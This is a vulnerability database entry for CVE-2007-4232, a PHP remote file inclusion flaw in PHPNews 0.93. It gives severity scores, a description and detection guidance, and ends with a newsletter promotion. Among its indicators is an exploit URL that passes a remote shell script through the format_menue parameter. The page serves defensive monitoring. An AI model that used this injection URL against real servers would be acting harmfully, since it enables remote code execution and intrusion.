cbcvebase.
CVE-2007-4232
published 2007-08-08

CVE-2007-4232: PHP remote file inclusion vulnerability in admin/inc/change_action.php in Andreas Robertz PHPNews 0.93 allows remote attackers to execute arbitrary PHP code…

PriorityP351medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
51.65%
98.8th percentile
PHP remote file inclusion vulnerability in admin/inc/change_action.php in Andreas Robertz PHPNews 0.93 allows remote attackers to execute arbitrary PHP code via a URL in the format_menue parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
andreas_robertzphpnews

Detection & IOCsextracted from sources · hover to see the quote

pathadmin/inc/change_action.php
urlhttp://site.com/path/admin/inc/change_action.php?format_menue=[[Sh3LLScript]]
  • Monitor HTTP requests targeting admin/inc/change_action.php with a URL-like value in the 'format_menue' GET parameter, which indicates a Remote File Inclusion (RFI) attempt against PHPNews 0.93.
  • Alert on any inbound GET request where the 'format_menue' parameter value begins with 'http://' or 'https://', as this is the direct exploitation vector for arbitrary PHP code execution.
  • ·The vulnerability is only exploitable if PHP's 'allow_url_include' (or 'allow_url_fopen' in older PHP versions) is enabled on the server, as the attack relies on remote file inclusion via a user-supplied URL.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.